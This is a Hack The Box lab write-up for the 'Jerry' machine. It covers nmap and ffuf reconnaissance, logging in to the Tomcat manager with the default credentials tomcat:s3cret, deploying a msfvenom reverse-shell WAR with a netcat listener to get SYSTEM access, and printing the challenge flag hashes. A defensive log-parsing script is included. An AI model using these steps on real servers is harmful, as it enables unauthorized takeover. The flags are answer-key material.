HTB — Jerry
What do you say, Tom, can you catch me?
Starting with an Nmap scan, we find one open port:
# Nmap 7.93 scan initiated Wed Jan 24 01:18:54 2024 as: nmap -sV -sC -Pn -p 8080 -o nmap.txt jerry.htb
Nmap scan report for jerry.htb (10.129.145.195)
Host is up (0.097s latency).
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/7.0.88
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jan 24 01:19:06 2024 -- 1 IP address (1 host up) scanned in 12.54 seconds
Let’s check whether the installed version of Apache Tomcat has any known exploits:
$ searchsploit Tomcat 7.0.88
--------------------------------------------------------------------------------------------------------------- ---------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------- ---------------------------
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (1) | windows/webapps/42953.txt
Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2) | jsp/webapps/42966.py
--------------------------------------------------------------------------------------------------------------- ---------------------------
Shellcodes: No Results
Fuzzing the web root gave us a few directories to look at:
$ ./ffuf -w /usr/share/wordlists/dirb/big.txt -u http://jerry.htb:8080/FUZZ -o ../fuzzed.txt
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://jerry.htb:8080/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Output file : ../fuzzed.txt
:: File format : json
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
docs [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 105ms]
examples [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 105ms]
favicon.ico [Status: 200, Size: 21630, Words: 19, Lines: 22, Duration: 107ms]
lpt1 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 99ms]
lpt2 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 100ms]
manager [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 98ms]
nul [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 121ms]
prn [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 114ms]
:: Progress: [20469/20469] :: Job [1/1] :: 395 req/sec :: Duration: [0:00:54] :: Errors: 0 ::
The /manager directory seems interesting, and perhaps we can use some default credentials to log in. In this case we can try the username:password combination tomcat:s3cret to log in to the manager webapp.
Once inside we see an upload section which we can use to our advantage, but we can only upload WAR files, so let’s craft a payload for it, which you can find here.
For simplicity's sake the line we are looking for is this:
msfvenom -p java/shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LPORT> -f war -o revshell.war
Now all we have to do is upload our payload and start the listener in our terminal using netcat:
nc -lvnp <LPORT>
And with that we get a shell as NT AUTHORITY\SYSTEM on the machine:
$ nc -lvnp 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.154.214.
Ncat: Connection from 10.129.154.214:49192.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\apache-tomcat-7.0.88>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0834-6C04
Directory of C:\apache-tomcat-7.0.88
06/19/2018 03:07 AM <DIR> .
06/19/2018 03:07 AM <DIR> ..
06/19/2018 03:06 AM <DIR> bin
06/19/2018 05:47 AM <DIR> conf
06/19/2018 03:06 AM <DIR> lib
05/07/2018 01:16 PM 57,896 LICENSE
01/25/2024 10:26 PM <DIR> logs
05/07/2018 01:16 PM 1,275 NOTICE
05/07/2018 01:16 PM 9,600 RELEASE-NOTES
05/07/2018 01:16 PM 17,454 RUNNING.txt
06/19/2018 03:06 AM <DIR> temp
01/25/2024 10:38 PM <DIR> webapps
06/19/2018 03:34 AM <DIR> work
4 File(s) 86,225 bytes
9 Dir(s) 2,420,121,600 bytes free
C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
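A defender-side check for the deployment path shown above, as an added example that is not part of the original writeup: it parses Tomcat access-log lines (a constructed sample with hypothetical IPs and timestamps) and flags successful WAR uploads through the manager app, noting whether the same source was first challenged with a 401, which is what a default-credential login looks like in the log.

```python
import re
from collections import defaultdict

# Constructed sample of Tomcat access-log lines (localhost_access_log, common format).
# IPs, timestamps and the CSRF nonce are hypothetical, not taken from the box.
SAMPLE_LOG = """\
10.10.14.5 - - [24/Jan/2024:01:20:01 +0000] "GET /manager/html HTTP/1.1" 401 2536
10.10.14.5 - tomcat [24/Jan/2024:01:20:09 +0000] "GET /manager/html HTTP/1.1" 200 11896
10.10.14.5 - tomcat [24/Jan/2024:01:21:30 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 12345
10.10.14.5 - - [24/Jan/2024:01:21:33 +0000] "GET /revshell/ HTTP/1.1" 200 0
10.10.14.9 - - [24/Jan/2024:01:25:00 +0000] "GET /docs/ HTTP/1.1" 200 4521
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Manager endpoints that accept a WAR: the HTML upload form and the text/script deploy API.
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy", "/manager/deploy")

def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["status"] = int(d["status"])
    d["path"] = d["path"].split("?", 1)[0]   # drop the query string (CSRF nonce etc.)
    return d

def find_war_deployments(log_text):
    """Return one alert per successful WAR deployment via the manager app, with the
    context a responder wants: source IP, authenticated user, and whether that
    source hit the manager unauthenticated (401) before the deploy succeeded."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    saw_401 = defaultdict(bool)
    alerts = []
    for e in events:
        if e["path"].startswith("/manager") and e["status"] == 401:
            saw_401[e["ip"]] = True
        if e["path"].startswith(DEPLOY_PATHS) and e["method"] in ("POST", "PUT") and e["status"] == 200:
            alerts.append({"ip": e["ip"], "user": e["user"], "time": e["ts"],
                           "path": e["path"], "challenged_first": saw_401[e["ip"]]})
    return alerts

if __name__ == "__main__":
    for alert in find_war_deployments(SAMPLE_LOG):
        print(alert)
```

The same logic runs unchanged over a real localhost_access_log file; the deploy itself is the event worth alerting on, since a legitimate deployment pipeline rarely goes through the manager app from an arbitrary source.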
All that’s left is to find the flags, which are in the Administrator’s Desktop folder; that finishes this machine.
C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00
root.txt
04a8b36e1545a455393d067e772fe90e